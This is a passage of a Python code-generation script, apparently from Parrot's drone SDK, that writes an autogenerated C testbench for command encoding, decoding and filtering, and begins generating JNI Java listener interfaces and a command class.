hasArgOfType[ArArgType.ENUM] = True elif isinstance(arg.argType, ArBitfield): hasArgOfType[ArArgType.BITFIELD] = True hasArgOfType[arg.argType.btfType] = True else: hasArgOfType[arg.argType] = True ################################# # 11TH PART : # ################################# # Generate C Testbench # ################################# def TB_CALL_VARNAME (ftr, cmd): return get_ftr_old_name(ftr) + ARCapitalize (format_cmd_name(cmd)) + 'ShouldBeCalled' def TB_CREATE_VARNAME (ftr, cmd): return 'int ' + TB_CALL_VARNAME (ftr, cmd) + ' = 0;' cfile = open (paths.TB_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n') cfile.write ('#include <libARSAL/ARSAL_Print.h>\n') cfile.write ('#include <stdlib.h>\n') cfile.write ('#include <string.h>\n') cfile.write ('\n') cfile.write ('int errcount;\n') cfile.write ('char describeBuffer [1024] = {0};\n') cfile.write ('\n') for ftr in allFeatures: for msg in ftr.cmds + ftr.evts: cfile.write (TB_CREATE_VARNAME (ftr, msg) + '\n') cfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: cmdNamePrint = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name cfile.write ('void ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (') first = True for arg in cmd.args: if first: first = False else: cfile.write (', ') cfile.write (xmlToC (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name) if not first: cfile.write (', ') cfile.write ('void *custom)\n') cfile.write ('{\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Callback for command ' + get_ftr_old_name(ftr) + '.' + cmdNamePrint + ' --> Custom PTR = %p", custom);\n') for arg in cmd.args: cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "' + arg.name + ' value : <' + xmlToPrintf (ftr, cmd, arg) + '>", ' + arg.name + ');\n') if ArArgType.STRING == arg.argType: cfile.write (' if (strcmp (' + xmlToSample (ftr, cmd, arg) + ', ' + arg.name + ') != 0)\n') else: cfile.write (' if (' + arg.name + ' != ' + xmlToSample (ftr, cmd, arg) + ')\n') cfile.write (' {\n') if ArArgType.STRING == arg.argType: cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD ARG VALUE !!! --> Expected <%s>", ' + xmlToSample (ftr, cmd, arg) + ');\n') else: cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD ARG VALUE !!! --> Expected <' + xmlToSample (ftr, cmd, arg) + '>");\n') cfile.write (' errcount++ ;\n') cfile.write (' }\n') cfile.write (' if (' + TB_CALL_VARNAME (ftr, cmd) + ' == 0)\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD CALLBACK !!! --> This callback should not have been called for this command");\n') cfile.write (' errcount++ ;\n') cfile.write (' }\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('void ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'initCb') + ' (void)\n') cfile.write ('{\n') cfile.write (' intptr_t cbCustom = 0;\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ((' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ') ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ', (void *)cbCustom++ );\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'filterTest') + ' (uint8_t *buffer, uint32_t size, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' (*setter)(ARCOMMANDS_Filter_t *, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + '))\n') cfile.write ('{\n') cfile.write (' int errors = 0;\n') cfile.write (' ARCOMMANDS_Filter_t *testFilter = NULL;\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' filterError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' filterStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ';\n') cfile.write (' // Default allow, set to block after\n') cfile.write (' testFilter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', &filterError);\n') cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while creating allow filter : %d", filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n') cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') ||\n') cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' // Change filter status\n') cfile.write (' filterError = setter (testFilter, ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ');\n') cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while setting filter state to blocked : %d", filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n') cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ') ||\n') cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&testFilter);\n') cfile.write (' }\n') cfile.write (' // Default block, set to allow after\n') cfile.write (' testFilter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', &filterError);\n') cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while creating block filter : %d", filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n') cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ') ||\n') cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' // Change filter status\n') cfile.write (' filterError = setter (testFilter, ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ');\n') cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while setting filter state to allowed : %d", filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n') cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') ||\n') cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n') cfile.write (' errors++;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&testFilter);\n') cfile.write (' }\n') cfile.write (' return errors;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ()\n') cfile.write ('{\n') cfile.write (' int32_t buffSize = 128;\n') cfile.write (' uint8_t *buffer = malloc (buffSize * sizeof (uint8_t));\n') cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' res = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ';\n') cfile.write (' int32_t resSize = 0;\n') cfile.write (' errcount = 0;\n') cfile.write (' ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'initCb') + ' ();\n') for ftr in allFeatures: cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n') for cmd in ftr.cmds + ftr.evts: cmdNamePrint = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name cfile.write (' res = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (buffer, buffSize, &resSize') for arg in cmd.args: cfile.write (', ' + xmlToSample (ftr, cmd, arg)) cfile.write (');\n') cfile.write (' if (res != ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while generating command ' + ARCapitalize (get_ftr_old_name(ftr)) + '.' + cmdNamePrint + '\\n\\n");\n') cfile.write (' errcount++ ;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Generating command ' + ARCapitalize (get_ftr_old_name(ftr)) + '.' + cmdNamePrint + ' succeded");\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err;\n') cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (buffer, resSize, describeBuffer, 1024);\n') cfile.write (' if (err != ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while describing buffer: %d", err);\n') cfile.write (' errcount++ ;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "%s", describeBuffer);\n') cfile.write (' }\n') cfile.write (' errcount += ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'filterTest') + ' (buffer, resSize, ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior);\n') cfile.write (' ' + TB_CALL_VARNAME (ftr, cmd) + ' = 1;\n') cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (buffer, resSize);\n') cfile.write (' ' + TB_CALL_VARNAME (ftr, cmd) + ' = 0;\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Decode return value : %d\\n\\n", err);\n') cfile.write (' if (err != ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' errcount++ ;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write ('\n') cfile.write ('\n') cfile.write (' if (errcount == 0)\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "No errors !");\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "%d errors detected during autoTest", errcount);\n') cfile.write (' }\n') cfile.write (' if (buffer != NULL)\n') cfile.write (' {\n') cfile.write (' free (buffer);\n') cfile.write (' }\n') cfile.write (' return errcount;\n') cfile.write ('}\n') cfile.close () hfile = open (paths.TB_HFILE, 'w') hfile.write (LICENCE_HEADER) hfile.write ('/********************************************\n') hfile.write (' * AUTOGENERATED FILE *\n') hfile.write (' * DO NOT MODIFY IT *\n') hfile.write (' * *\n') hfile.write (' * To add new commands : *\n') hfile.write (' * - Modify ../Xml/commands.xml file *\n') hfile.write (' * - Re-run generateCommandsList.py script *\n') hfile.write (' * *\n') hfile.write (' ********************************************/\n') hfile.write ('#ifndef ' + TB_DEFINE + '\n') hfile.write ('#define ' + TB_DEFINE + ' (1)\n') hfile.write ('\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ();\n') hfile.write ('\n') hfile.write ('#endif /* ' + TB_DEFINE + ' */\n') hfile.close () cfile = open (paths.TB_LIN_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include "' + TB_HFILE_NAME + '"\n') cfile.write ('\n') cfile.write ('int main (int argc, char *argv[])\n') cfile.write ('{\n') cfile.write (' return ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ();\n') cfile.write ('}\n') cfile.close () def java_generateCmds(ctx, paths): genDebug = True genTreeFilename = None projects = [DEFAULTPROJECTNAME] if not os.path.exists (paths.JNI_DIR): os.makedirs (paths.JNI_DIR) if not os.path.exists (paths.JNIJ_OUT_DIR): os.makedirs (paths.JNIJ_OUT_DIR) allFeatures = ctx.features # Check types used for ftr in allFeatures: for msg in ftr.getMsgs(): for arg in msg.args: if isinstance(arg.argType, ArEnum): hasArgOfType[ArArgType.ENUM] = True elif isinstance(arg.argType, ArBitfield): hasArgOfType[ArArgType.BITFIELD] = True hasArgOfType[arg.argType.btfType] = True else: hasArgOfType[arg.argType] = True ################################# # 12TH PART : # ################################# # Generate JNI C/Java code # ################################# for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: jfile = open (paths.JNIJ_OUT_DIR + interfaceName (ftr, cmd) + '.java', 'w') jfile.write (LICENCE_HEADER) jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n') jfile.write ('\n') jfile.write ('/**\n') jfile.write (' * Interface for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code> listener\n') jfile.write (' * @author Parrot (c) 2013\n') jfile.write (' */\n') jfile.write ('public interface ' + interfaceName (ftr, cmd) + ' {\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Called when a command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code> is decoded\n') for arg in cmd.args: jfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n') jfile.write (' */\n') jfile.write (' void ' + javaCbName (ftr, cmd) + ' (') first = True for arg in cmd.args: if first: first = False else: jfile.write (', ') jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name) jfile.write (');\n') jfile.write ('}\n') jfile.close () jfile = open (paths.JNI_JFILE, 'w') jfile.write (LICENCE_HEADER) jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n') jfile.write ('\n') jfile.write ('import ' + SDK_PACKAGE_ROOT + 'arsal.ARNativeData;\n') jfile.write ('\n') jfile.write ('/**\n') jfile.write (' * Java representation of a C ' + JNIClassName + ' object.<br>\n') jfile.write (' * This class holds either app-generated objects, that are to be sent\n') jfile.write (' * to the device, or network-generated objects, that are to be decoded by\n') jfile.write (' * the application.\n') jfile.write (' * @author Parrot (c) 2013\n') jfile.write (' */\n') jfile.write ('public class ' + JNIClassName + ' extends ARNativeData {\n') jfile.write ('\n') jfile.write (' public static final int ' + ARMacroName (LIB_MODULE, JNIClassName, 'HEADER_SIZE') + ' = 4;\n') jfile.write (' public static final boolean ' + ARMacroName (LIB_MODULE, JNIClassName, 'HAS_DEBUG_COMMANDS') + ' = ') if genDebug: jfile.write ('true;\n') else: jfile.write ('false;\n') jfile.write (' private static final ' + JNIDecoderClassName + ' _decoder = new '+JNIDecoderClassName+'();\n') jfile.write ('\n') # Generate bit field flags for ftr in allFeatures: oldEnumValFrm = False if ftr.classes == None else True for enum in ftr.enums: if enum.usedLikeBitfield: for eVal in enum.values: jfile.write (' public static final int ' + ARFlagValue (LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name) + ' = (1 << '+ARJavaEnumValue (LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm)+ '.getValue()); ///< ' + eVal.doc.replace('\n', '\\n') + '\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new, empty ' + JNIClassName + ' with the default size.<br>\n') jfile.write (' * This is a typical constructor for app-generated ' + JNIClassName + '.<br>\n') jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n') jfile.write (' * object after it was disposed.\n') jfile.write (' */\n') jfile.write (' public ' + JNIClassName + ' () {\n') jfile.write (' super ();\n') jfile.write (' }\n') jfile.write ('\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new, empty ' + JNIClassName + ' with an user-specified size.<br>\n') jfile.write (' * This is a typical constructor for app-generated ' + JNIClassName + '.<br>\n') jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n') jfile.write (' * object after it was disposed.\n') jfile.write (' * @param capacity user specified capacity of the command buffer\n') jfile.write (' */\n') jfile.write (' public ' + JNIClassName + ' (int capacity) {\n') jfile.write (' super (capacity);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new ' + JNIClassName + ' from another ARNativeData instance.<br>\n') jfile.write (' * This is a typical constructor for network-generated ' + JNIClassName + '.<br>\n') jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n') jfile.write (' * object after it was disposed.\n') jfile.write (' * @param oldData ARNativeData which contains original data\n') jfile.write (' */\n') jfile.write (' public ' + JNIClassName + ' (ARNativeData oldData) {\n') jfile.write (' super (oldData);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new ' + JNIClassName + ' from a c pointer and size.<br>\n') jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n') jfile.write (' * object after it was disposed.\n') jfile.write (' * @param data The original data buffer to copy\n') jfile.write (' * @param dataSize The original data buffer size\n') jfile.write (' */\n') jfile.write (' public ' + JNIClassName + ' (long data, int dataSize) {\n') jfile.write (' super (data, dataSize);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new ' + JNIClassName + ' from another ARNativeData, with a given minimum capacity.<br>\n') jfile.write (' * This is a typical constructor for network-generated ' + JNIClassName + '.<br>\n') jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n') jfile.write (' * object after it was disposed.\n') jfile.write (' * @param oldData ARNativeData which contains original data\n') jfile.write (' * @param capacity Minimum capacity of this object\n') jfile.write (' */\n') jfile.write (' public ' + JNIClassName + ' (ARNativeData oldData, int capacity) {\n') jfile.write (' super (oldData, capacity);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Describe a ' + JNIClassName + '.<br>\n') jfile.write (' * @return A String describing the ' + JNIClassName + ', with arguments values included\n') jfile.write (' */\n') jfile.write (' public String toString () {\n') jfile.write (' return nativeToString (pointer, used);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Try to describe an ARNativeData as if it was an ' + JNIClassName + '.<br>\n') jfile.write (' * @return A String describing the ARNativeData, if possible as an ' + JNIClassName + '.\n') jfile.write (' */\n') jfile.write (' public static String arNativeDataToARCommandString (ARNativeData data) {\n') jfile.write (' if (data == null) { return "null"; }\n') jfile.write (' String ret = nativeStaticToString(data.getData(), data.getDataSize());\n') jfile.write (' if (ret == null) { ret = data.toString(); }\n') jfile.write (' return ret;\n'); jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * @deprecated\n') jfile.write (' * Decodes the current ' + JNIClassName + ', calling commands listeners<br>\n') jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIClassName + ',\n') jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n') jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n') jfile.write (' */\n') jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode () {\n') jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n') jfile.write (' if (!valid) {\n') jfile.write (' return err;\n') jfile.write (' }\n') jfile.write (' return _decoder.decode (this);\n') jfile.write (' }\n') jfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: jfile.write (' /**\n') jfile.write (' * Set an ' + JNIClassName + ' to hold the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n') jfile.write (' * <br>\n') jfile.write (' * Feature ' + ARCapitalize (get_ftr_old_name(ftr)) + ' description:<br>\n') jfile.write (' * ' + ftr.doc.replace('\n', '\\n') + '<br>\n') jfile.write (' * <br>\n') if cmd.cls: jfile.write (' * Class ' + ARCapitalize (cmd.cls.name) + ' description:<br>\n') jfile.write (' * ' + cmd.cls.doc.replace('\n', '\\n') + '<br>\n') jfile.write (' * <br>\n') jfile.write (' * Command ' + ARCapitalize (cmd.name) + ' description:<br>\n') if cmd.isDeprecated: jfile.write (' * @deprecated\n') jfile.write (' * ' + cmd.doc.desc.replace('\n', '<br>\n * ') + '<br>\n') jfile.write (' * <br>\n') jfile.write (' * This function reuses the current ' + JNIClassName + ', replacing its content with a\n') jfile.write (' * new command created from the current params\n') for arg in cmd.args: jfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n') #If the argument is a bitfield if isinstance(arg.argType, ArBitfield): jfile.write (' * @param _' + arg.name + ' a combination of') #find the feature owning the enum for bitFieldFtr in allFeatures: for enum2 in bitFieldFtr.enums: if enum2 == arg.argType.enum: break; else: continue break for eVal in arg.argType.enum.values: jfile.write (' ; ' + ARFlagValue(LIB_MODULE, bitFieldFtr.name , arg.argType.enum.name, eVal.name)) jfile.write ('\n') jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' error code.\n') jfile.write (' */\n') jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (') first = True for arg in cmd.args: if first: first = False else: jfile.write (', ') jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name) jfile.write (') {\n') jfile.write (' ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR', True) + ';\n') jfile.write (' if (!valid) {\n') jfile.write (' return err;\n') jfile.write (' }\n') jfile.write (' int errInt = nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (pointer, capacity') for arg in cmd.args: if isinstance(arg.argType, ArEnum): jfile.write (', _' + arg.name + '.getValue()') elif isinstance(arg.argType, ArMultiSetting): for multiset_msg in arg.argType.msgs: jfile.write (', _' + arg.name + '.get'+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+'IsSet()') for multiset_msg_arg in multiset_msg.args: jfile.write (', _' + arg.name + '.get'+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+ARCapitalize(multiset_msg_arg.name)+'()') else: jfile.write (', _' + arg.name) jfile.write (');\n') jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.getFromValue (errInt) != null) {\n') jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.getFromValue (errInt);\n') jfile.write (' }\n') jfile.write (' return err;\n') jfile.write (' }\n') jfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: jfile.write (' /**\n') jfile.write (' * @deprecated\n') jfile.write (' * Set the listener for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n') jfile.write (' * Listeners are static to the class, and are not to be set on every object\n') jfile.write (' * @param ' + interfaceVar (ftr, cmd) + '_PARAM New listener for the command\n') jfile.write (' */\n') jfile.write (' public static void set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener (' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + '_PARAM) {\n') jfile.write (' _decoder.set' + ARCapitalize (get_ftr_old_name(ftr)) + 